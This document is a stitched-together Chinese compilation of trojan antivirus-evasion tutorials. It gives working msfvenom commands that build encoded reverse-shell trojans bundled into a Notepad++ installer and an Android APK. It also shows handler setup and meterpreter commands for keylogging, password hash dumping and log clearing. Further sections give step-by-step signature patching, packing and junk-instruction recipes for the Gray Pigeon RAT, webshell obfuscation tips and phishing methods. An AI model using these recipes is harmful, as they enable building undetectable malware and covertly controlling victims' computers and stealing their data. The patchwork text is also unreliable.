木马免杀技术

第五章木马的免杀技术有矛就有盾,木马程序和杀毒软件厂商就像矛和盾一样,从木马程序的诞生起,各大杀毒软件厂商就一直在研发各种查杀技术,不过从目前的情况来看,情况不容乐观,目前大部分杀毒软件采用的特征码查毒,这种查杀毒技术在与木马程序较量中,已经处于非常不利的位置,甚至可以这样说: 特征码查毒技术已经失败了,只要修改掉木马程序的特征码,就可以非常容易躲过杀毒软件的查杀,如查杀毒软件厂商,在查杀病毒的技术上没有突破的话,将处于非常被动的处境.通过本章的介绍,大家会发现,木马程序是怎样躲过杀毒软件的查杀的,希望通过本章的学习,大家对木马和查杀技术有一个初步的了解,再强调两点:--------不要运行陌生的程序,尽管用杀毒软件扫描过.---------尽管木马程序可以非常轻松的躲过杀毒软件的查杀,但还是要安装杀毒软件,并且把病毒库更新到最新版本.5.1 基础知识在讲免杀之前，先介绍一个基础的知识，为后面的内容打下基础，先了解一下杀毒软件的原理与杀毒枝术。

1.杀毒枝术首先，杀毒软件虽然可以杀毒，但他也只是一个普通的应用程序，和常用的QQ，讯雷等一样，都是一个普通的应用程序而已，只是功能不一样。

因此不要把它想得特神奇，杀毒软件一般由扫描器，病毒库，虚拟机组成。

并由主程序把它们整合，扫描器用于查杀病毒，病毒库里存储着病毒所具有的特征码，业内称之为“特征码”，病毒库里的特征码取决于所使用的扫描技术，因此对于同一个病毒，不同的杀毒软件，所定义的特征码可能不同，而特征码又分为文件特征码和内存特征码，虚拟机则是一个较新的概念，它可以让病毒在一个虚拟的环境下运行，从而让其与物理设备隔离，从而更加安全的进行查杀病毒。

简单的说，杀毒软件的原理就是特征码匹配，例如杀毒软件在扫描一个文件时，首先会检测这个文件里面是否有病毒库里面所包括的特征码，如果有就判断为病毒，并采取相应的操作，如隔离或是删除，这和设置有关，如果文件里面没有病毒库里的特征码，则杀毒软件会把它判断为正常的应用程序。

MSF制作免杀⽊马1、制作exe免杀⽊马前⾔免杀技术全称为反杀毒技术Anti-Virus简称“免杀”，它指的是⼀种能使病毒⽊马免于被杀毒软件查杀的技术。

由于免杀技术的涉猎⾯⾮常⼴，其中包含反汇编、逆向⼯程、系统漏洞等技术，内容基本上都是修改病毒、⽊马的内容改变特征码，从⽽躲避了杀毒软件的查杀。

MSF编码在 Meatsploit 框架下免杀的⽅式之⼀就是使⽤MSF编码器。

其功能是对攻击载荷⽂件进⾏重新的排列编码，改变可执⾏⽂件中的代码形状，避免被杀软认出。

MSF 编码器可以将原可执⾏程序重新编码，⽣成⼀个新的⼆进制⽂件，这个⽂件运⾏以后，MSF 编码器会将原始程序解码到内存中并执⾏。

1.1 查看编码格式在Kali终端输⼊msfvemon -l encoders列出所有可⽤编码格式。

需要注意的是并不是所有的编码⽅式都适⽤于Windows系统，建议使⽤x86/shikata_ga_nai格式1.2 制作免杀⽊马由于裸奔⽊马容易被杀毒软件查杀，因此需要将⽊马捆绑到⼀个正常的软件上，这⾥使⽤notepad为例。

裸奔⽊马1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe免杀⽊马1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe⽣成exe⽊马⽂件1.3 运⾏msf监听模块1 msfconsole2 use multi/handler4set payload windows/shell_reverse_tcp5set LHOST 10.10.20.26set LPORT 33337 exploit1.4运⾏⽊马程序在Kali上开启监听，在客户机上执⾏刚才⽣成的⽊马⽂件，会⾃动连接上Kali，接下来就可以对客户机进⾏远程控制1 meterpreter下的命令：2 getwd 当前⽬录3 dir 查看所有⽂件4 cat c:\123.txt 查看⽂件123.txt内容（数据是字符串传递，所以加⼀个转义字符\）5 search -f cmd.exe （搜索名为cmd.exe⽂件所在⽬录）6 upload /root/桌⾯/backldoor.exe（要上传的⽂件） -> c:\（上传到的⽬录）上传⽂件7 download c:\123txt /root 下载⽂件8 clearev 清除⽇志9 getuid 当前⽤户10 ps 查看所⽤进程11 kill 杀死某个进程12 sysinfo 系统信息1314键盘记录15 keyscan_start 开始键盘记录16 keyscan_dump 查看结果17 keyscan_stop1819屏幕截图20 screenshot2122屏幕监控23 run vnc2425获取密⽂密码26 hashdump2728 shell29获取shell，进⼊cmd2、MSF制作安卓⽊马2.1 制作apk⽊马程序1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk2.2其他步骤可以参考上述的步骤2.3 命令sysinfo更多命令请使⽤help命令查看。

一.免杀工具:myccl:特征码定位器PEID:查壳工具C32Asm:特征码修改工具[静态]Ollybg:特征码修改工具[动态]OC:文件地址内存地址换算器加花工具:怒剑狂花加区段工具:zeroadd加密工具:兼容性较好的,maskPE2.0和VMProtect v 1.4压缩工具:upx,aspack北斗壳二.熟悉掌握的术语与操作:加密工具操作花指令编写手工加花myccl复合特征码,内存特征码定位方法特征码修改三.研究免杀方法与技巧1.善于收集新免杀工具,有特效的压缩工具,免杀器等.比如收集一些可直接过杀软的压缩，加密工具2.理解免杀原理,熟悉各种杀毒软件的查杀特点3.多学习相关汇编知识相关汇编资料4.看别人优秀教程,举一反三.5.大胆的猜想与不断的实验和测试.四：特征码与花指令的详细定义与修改添加的方法等价替换、通用跳转、指令顺序调换、大小写替换、特征码十六进制加减1、NOP、填0、以及特殊常见指令的修改方法.JMP 无条件转移指令CALL 过程调用RET/RETF 过程返回.PUSH 压入堆栈.NOP 空操作.等价替换：修改方法:JMP = JE JNE je改成jle ja/jle适用范围:把特征码所对应的汇编指令命令中替换成类拟的指令通用跳转法：修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.（可以换成push xxxx retn）适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.指令顺序调换法：修改方法:把具有特征码的代码顺序互换一下.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行修改字符串大小写法：修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.适用范围:特征码所对应的内容必需是字符串,否则不能成功.（注意：函数不能用这种方法）直接修改特征码的十六进制法（特征码十六进制加减1、nop）修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制、或者填充90（nop）或者填0适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能否正常使用.test eax, eax很多程序都是用test eax, eax来做检测返回值是否为0，那么遇到test eax, eax 那么可以直接改or eax, eaxcall例子：call 11111111改成 call 22222222 （22222222为0区域）2222处jmp 11111111五：简单花指令的编写PUSH 把字压入堆栈.POP 把字弹出堆栈.PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.ADD 加法.ADC 带进位加法.INC 加1.AAA 加法的ASCII码调整.DAA 加法的十进制调整.SUB 减法.SBB 带借位减法.DEC 减1.JMP 无条件转移指令CALL 过程调用RET/RETN 过程返回.。

msf反弹⽊马之免杀原理利⽤msf模块中的msfvenom模块，⾸先⽣成.exe⽊马⽂件，⽤靶机打开，攻击成功后，就渗透到了靶机系统中。

准备win7靶机 ip ：192.168.56.130kali攻击机 ip: 192.168.56.135##实战开始1.打开kali机，在命令⾏输⼊：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exeLHOST是主机的ip，⽤来“提醒”⽊马成功后应该返回信息给⾃⼰的主机。

lport是返回时连接的端⼝号，需要开启tcp功能，1234端⼝好像默认开启？> 后⾯的那⼀串表⽰⽊马⽣成的对应地址，为了⽅便操作我直接⽣成在桌⾯上。

-e x86/shikata_ga_nai 为使⽤shikata_ga_nai的编码⽅式对攻击载荷进⾏重新编码-i 5为使⽤刚才设定的编码⽅式对⽬标进⾏5次编码2.命令⾏输⼊shellter第⼀个选项选择A3.PE Target 后⾯填写/home/kali/Desktop/1.exe，即⽊马所在路径。

然后等待⼀段时间······注意，虽然看着不动，但是上⾯那个数字⼀直在跳，所以不是你卡住了~ 4.然后选择Y5.选择L，payload index 选择16.设置LHOST以及LPORT等个⼤概2秒钟，就结束了~免杀⽊马制作完成。

命令⾏输⼊msfconsole进⼊metasploit。

然后输⼊use exploit/multi/handler开启监听模式接下来就是设置参数了，可以使⽤option命令来查看需要设置的参数。

主要设置三个：payload、LHOST、LPORT，需要跟⽊马⼀样，复制⼀下就⾏set payload windows/meterpreter/reverse_tcpset lhost 192.168.56.135set lport 1234这⾥⼤⼩写随意，都可以被识别。

免杀的原理大全一、工具mycll:特征码定位PEID：查壳工具PEditor:入口点修改工具加花c32asmollybgoc：文件地址到内存地址的换算resscope:资源编辑zeroadd:加区段的木马采衣：加花maskpe,vmprotect：加密upx,aspack北斗壳：压缩免疫007：免疫器二、效果分析1、加密：vmprotectv1.21和MASKPE2.0（对瑞星有特效），比较容易过瑞星表面，不能过卡巴压缩：北斗，UPX：主要是减少体积加花：对卡巴有特效，通用性比较好2、北斗+VMpro,但是北斗+maskpe出错！无壳木马可以先加花3、无壳木马直接用maskPE22.0可过瑞星表面但是过不了卡巴。

4、无壳木马加一道花指令后再用VMPRO1.21加密可直接过卡巴但是可能无法过瑞星表面5、经过免杀处理，过几种杀毒软件，加压缩壳后仍免杀过他们，但是北斗除外，棉纱处理国卡巴的木马北斗后可能被卡巴杀6、测试操作1）手工加花+掘北压缩，鸽子先脱壳，在用OD在零区域添加指令（根据字节编写）：先找原入口点，零区域，记录其地址（新入口点），指令push eax pop eax add esp 1 inc esp push 004A1E48 retn保存。

用PE修改入口点。

能过卡巴，过不了瑞星。

用掘北（对瑞星表面有特效）2）工具加花（花蝴蝶三号）+VMPRO+UPX。

**器三、手工加花方法1、直接：OD，记录入口点；找零区域，复制地址（新入口）；写指令：push 0 nop add esp 2inc esp inc esp push exp pop esp push原入口点retn改入口点（新）（lordpe）；可以把这段代码保存为二进制以后方便用。

2、去头：复制头，并去掉，填加到空白区域（新地址）；再填加花指令。

3、加区：zeroadd加区段，大小一般100左右；OD打开文件，用ALT+M打开内存景象，复制区段入口地址和原程序入口，到区段加花，程序入口地址不变；lordpe 修改入口为区段的入口。

木马免杀全攻略和特征码替换简而告之……1.杀毒原理通常，一个病毒防御工作者拿到一个截获或上报上来的病毒时，先是分析这个病毒文件执行后的动作，所谓“动作”，就是指病毒文件执行后会做哪些操作。

例如会生成什么新文件、怎样更改注册表、怎样注册服务、打开什么端口等等。

搞明白这些后，下一步一般会研究这个病毒的文件结构，然后找出与众不同的地方，将其定义为特征码。

而这个特征码定义的高明与否，就要看他定义的位置是否刁钻，例如他如果定义的是病毒文件更改注册表键值那部分代码的话，这显然不会太难！因为只要病毒文件更改键值，99%的情况下这个文件里一定存在被更改键值的字符串，所以找到这段字符串的位置就可以定义特征码了。

但是针对这种特征码做免杀是非常容易的，只需找到相应的位置，并更改字母的大小写即可。

而如果从文件头找出一段特征码就是非常不容易的事情了……除此之外，所定义的特征码还有一个分支，即内存特征码。

所谓内存特征码就是指木马文件运行后释放到内存时所存在的特征，它的原理大体与上面介绍的文件特征码一样。

当特征码定义出来之后，就会被提交到另外的一个部门，然后进入病毒定义库，当用户更新后，以后杀毒软件在碰到符合要求的文件时就会将其毫不忧郁的杀掉！也就是说，杀毒软件只认特征码，不认文件。

由此可见，病毒防御工作者寻找特征码的方式也不过如此，但这只是定义病毒文件特征码的工作，别的例如修复被感染文件等技术步骤和本文无关，在这也就不介绍了，有兴趣的朋友可以自己研究一下。

2.免杀分类免杀的方法有很多，无奈没见哪为朋友综合系统的介绍，也苦了小菜们求学无门，只好掏银子找“师傅”，所以我就自告奋勇站出来一次，不足之处还请各位高手多多包涵……我个人总结的免杀方法总共分两类，即主动免杀与被动免杀。

一、主动免杀1.修改字符特征：主动查找可能的特征码，包括木马文件修改注册表、生成新文件的名称与路径、注入的进程名等动作，也包括运行过程中可能出现或一定会出现的字符等文件特征。

免杀木马的制作与防范作者：金良磊来源：《电脑知识与技术》2008年第01期木马相信很多人都知道，而木马的确比常规病毒更狠，监控你的操作，吞噬你的隐私，破坏你的数据。

有人要问，为什么我们的计算机安装了最新的杀毒软件，每天进行各种补丁的更新升级，还有防火墙的时时保护，为什么还会中木马呢？那是因为，有一种木马叫免杀。

一、什么是免杀？免杀是个相对词，针对目前的技术而言，多数木马都不能避免会被杀毒软件监控到并杀掉的危险，于是木马的实用性就低很多。

为了能避开杀毒软件的识别，黑客们开始从木马下手，通过各种手段“重新包装”木马，让它在杀毒软件的眼皮底下蒙混过关，这就是所谓的免杀。

二、制作免杀木马下面我们来看看黑客们是通过何种方法制作完成免杀木马的：我们首先制作一个普通的灰鸽子木马服务端取名mmsetup.exe，然后登录/zh-cn/网站把mmsetup.exe灰鸽子木马服务端上传过去，通过多引擎系统中扫描，你可以发现，绝大多数的杀毒引擎都能够识别出该木马程序，木马成功率只有10%简直可以忽略了，木马也就没意义了！（如图1）同时，针对这个mmsetup.exe我们对它进行免杀设置，一般常用的免杀方法为加密代码、花指令、加壳、修改程序入口以及手工DIY PE，至于纯手工操作并不推荐，因为这种方法制作出的程序效果虽好，但太过复杂，需要很强的汇编语言基础，并对Windows内核有一定认识。

1、代码修改法MaskPE内含多种信息模块，可以方便的修改程序指令，打乱源代码，针对利用代码识别病毒的安全软件很有效果。

下载Maskpe2.0运行起来，点击“LoadFile”按钮，通过路径选择桌面上的mmsetup.exe木马，然后在“Select Information”项里选择“PE Information”项，接着点击“Make File”在新生成的木马名字里填上“mmsetup1.exe”，最后单击“保存”按钮完成木马修改。

如何实现一句话木马并免杀一句话木马是指通过一句短小的代码语句实现对目标计算机的入侵控制，由于其隐蔽性和高效性，成为黑客攻击的主要工具之一。

而如何实现一句话木马并免杀，是当前网络攻防领域中比较热门的话题之一。

一、一句话木马的实现方法1.利用 WebShell：WebShell是黑客通过漏洞对服务器进行攻击后，上传或创建的一个类似终端界面的脚本文件。

黑客通过以Web的方式访问WebShell获得服务器权限后，就可以在服务器上执行各种操作，如上传文件、下载数据库、执行系统命令等。

2.利用“eval”函数：eval函数是PHP中的一个函数，它可以将字符串作为PHP代码来执行。

黑客可以将一段木马代码写成字符串，并把字符串传递给eval函数来执行，从而实现一句话木马的效果。

3.利用文件包含漏洞：在编写PHP程序时，如果没有对用户输入的动态参数做安全过滤，就容易产生文件包含漏洞。

黑客可以通过构造一些特殊的参数来绕过安全检查，实现在网站上执行自己的代码。

二、一句话木马免杀的技巧由于一句话木马的代码非常短小，通常只有一行，因此很难通过传统的病毒查杀软件进行检测。

但为了避免被杀毒软件查杀，黑客们也在不断地探索免杀的方法。

1.字符串混淆：一句话木马的免杀方法之一就是字符串混淆。

将木马代码进行特殊编码、手动解码，或在代码中加入大量无意义的字符和空格等，使其难以被查杀软件发现。

2.变量替换：在一句话木马代码中，变量名可以随意命名。

将变量名更改为常见函数名或参数，可以使代码看起来更像正常的PHP代码，从而避免被杀毒软件查杀。

3.动态修改：在传递一句话木马代码时，可以采用动态修改的方式，每次传递时使用不同的代码段，从而使杀毒软件难以对其进行查杀。

4.分段传输：将一句话木马代码分成多个部分进行传输，每次只传输一部分，从而规避杀毒软件的检测。

三、防范一句话木马的方法1.及时更新补丁：一般情况下，黑客攻击使用的都是已知漏洞，通过及时更新软件补丁可以减少黑客攻击的成功率。

木马精华免杀教程教程来自【暗黑网络】暗黑网络技术公会让更多的朋友了解黑客-YY496342本公会采用YY方式是让您更加方便的交流和学习，本公会，免费赠送工具，教程，等一切免费，大量招收导师如果觉得你行那就来试试吧YY496342本公会+此文档只是让大家多一点防范的意识请勿用于非法第一部分：对国内外杀毒软件分析在讲特征码前，先要分析国内外著名杀毒软件的查杀特点。

大家在使用木马过程都会发现，内存查杀，一般都指得被瑞星的内存查杀。

瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。

像强悍的卡巴，金山，等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有内存查杀功能,但内存查杀功能比较弱.只针对影响力非常大的病毒程序.一般的黑客软件都没有提取内存特征码.第二部分：木马免杀的对策一.要使一个木马免杀，首先要准备一个不加壳的木马，这点非常重要，否则下面的免杀操作就不能进行下去。

二.然后我们要木马的内存免杀，从上面分析可以看出，目前的内存查杀，只有瑞星最强，其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀，要进行内存特征码的定位和修改，才能达到内存免杀。

二.对符其它的杀毒软件，比如江民，金山，诺顿,卡巴.我们可以采用下面的方法,或这些方面的组合使用.1>.入口点加1免杀法.2>.变化入口地址免杀法3>.加花指令法免杀法4>.加壳或加伪装壳免杀法.5>.打乱壳的头文件免杀法.6>.修改文件特征码免杀法.第三部分:免杀技术实例演示部分一.入口点加1免杀法:(NC)1.用到工具:PEditor2.特点:非常简单实用,但有时还会被卡巴查杀.3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可.二.变化入口地址免杀法:(NC)1.用到工具:OllyDbg,PEditor2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.三.加花指令法免杀法:(Sniff)1.用到工具:OllyDbg,PEditor2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.四.加壳或加伪装壳免杀法:(findpass)1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀.3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳.五.打乱壳的头文件免杀法:(nc)1.用到工具:秘密行动,UPX加壳工具.2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好.3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.六.修改文件特征码免杀法:1.用到工具:特征码定位器,OllyDbg2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好.3.操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程.第四部分:快速定位与修改瑞星内存特征码一.瑞星内存特征码特点:由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便.二定位与修改要点:1>.首先用特征码定位器大致定位出瑞星内存特征码位置2>.然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.第五部分:木马免杀综合方案修改内存特征码--->1>入口点加1免杀法---> 1>加压缩壳--->1>再加壳或多重加壳2>变化入口地址免杀法 2>加生僻壳 2>加壳的伪装.3>加花指令法免杀法 3>打乱壳的头文件4>修改文件特征码免杀法注:这个方案可以任意组合各种不同的免杀方案.并达到各种不同的免杀效果.第六部分:免杀方案实例演示部分1.完全免杀方案一:(灰鸽子VIP2.0)内存特征码修改+ 加UPX壳+ 秘密行动工具打乱UPX壳的头文件.2.完全免杀方案二:(findpass)内存特征码修改+ 加压缩壳+ 加壳的伪装3.完全免杀方案三:内存特征码修改+ 修改各种杀毒软件的文件特征码+ 加压缩壳4.完全免杀方案四:内存特征码修改+ 加花指令+ 加压缩壳5.完全变态免杀方案五:内存特征码修改+ 加花指令+ 入口点加1 + 加压缩壳UPX + 打乱壳的头文件还有其它免杀方案可根据第五部分任意组合.暗黑网络YY496342。

钓鱼手法及木马免杀技巧网络钓鱼是黑客入侵用户账号的一种手段。

黑客通常使用类似于欺骗的方式，伪装成合法的个人或公司，从而诱骗用户泄露个人敏感信息和账户密码。

其实，网络钓鱼的目的是通过木马病毒向电脑中植入Trojan等恶意软件，从而完全控制电脑或服务器并且窃取敏感信息。

在这里，我们将会介绍一些钓鱼手法及木马免杀技巧。

一、钓鱼手法介绍A.邮件钓鱼邮件钓鱼是最常用的网络钓鱼手法之一。

黑客会发送网页马或电子邮件的附件，以虚假的方式仿冒正规机构，例如银行、支付宝、淘宝等网站来欺骗用户。

在邮件中，黑客会引导用户点击附加链接，被黑客诱导的用户可能会通过填写个人信息或点击附加链接下载木马病毒，最终导致漏洞被利用。

B.钓鱼网站黑客通过恶意软件和技术手段制造出一个虚假的模拟网站，这个网站可能会仿照银行、购物网站、社交媒体等，伪装成一个合法网站，诱骗用户使用假网站账户和密码，借此攻击用户。

钓鱼网站犯罪分子可以通过深度模拟合法网站的方法来欺骗用户，有些钓鱼网站会变得非常类似。

C.短信钓鱼短信钓鱼是另一个常见的网络钓鱼手法。

黑客通常发送带有钓鱼链接的短信，这些短信条件很具有欺骗性，以让用户信任钓鱼链接为目的，从而安装木马软件。

D.社交网站钓鱼社交网站钓鱼是指通过社交网站，如Facebook、Twitter、Skype或QQ等平台，欺骗用户点击诱饵链接或下载伪装木马病毒程序来窃取敏感数据。

这种动机可能涉及到像论坛和招聘网站等多种类型的网站。

二、木马免杀技巧A.代码分割在木马免杀的技术中，黑客使用代码分割来混淆恶意代码，以逃避杀毒软件的检测。

黑客会将代码分割成多个片段，使用混淆方法削弱恶意代码的可读性。

这样的技术能够使恶意软件在杀毒软件中不易被发现。

B.使用代码压缩工具使用代码压缩工具如UPX和PECompact，可以对木马病毒代码进行压缩处理，在存储和传输环节中，可以减轻恶意程序的大小，从而保证了文件负载的微不足道，以免引起安全软件的高度警觉。

免杀有什么操作方法
免杀是指通过特定的技术手段来规避系统的安全检测和防护机制，一般用于恶意软件或攻击程序的隐藏和潜伏。

以下是一些典型的免杀操作方法：
1. 加密与压缩：对恶意代码进行加密或压缩，使其难以被杀软件和防病毒软件检测到。

2. 多层混淆：通过多次编码、加密、混淆等手段，使得恶意代码在运行时需要解密和解码才能正常执行，增加检测的难度。

3. 反射加载：将恶意代码写入内存并在运行时动态加载，避免存储在磁盘上，难以被杀软件和防病毒软件检测。

4. 文件伪装：将恶意代码伪装成合法的文件或进程，使其不易被检测。

5. 使用漏洞利用：利用系统或软件存在的漏洞来执行恶意代码，避免被传统的杀软检测。

以上是一些常见的免杀操作方法，实际上还有很多其他的技术手段可以用于规避安全检测和防护机制。

由于免杀会给系统安全带来潜在的威胁，因此对于防范免杀攻击至关重要。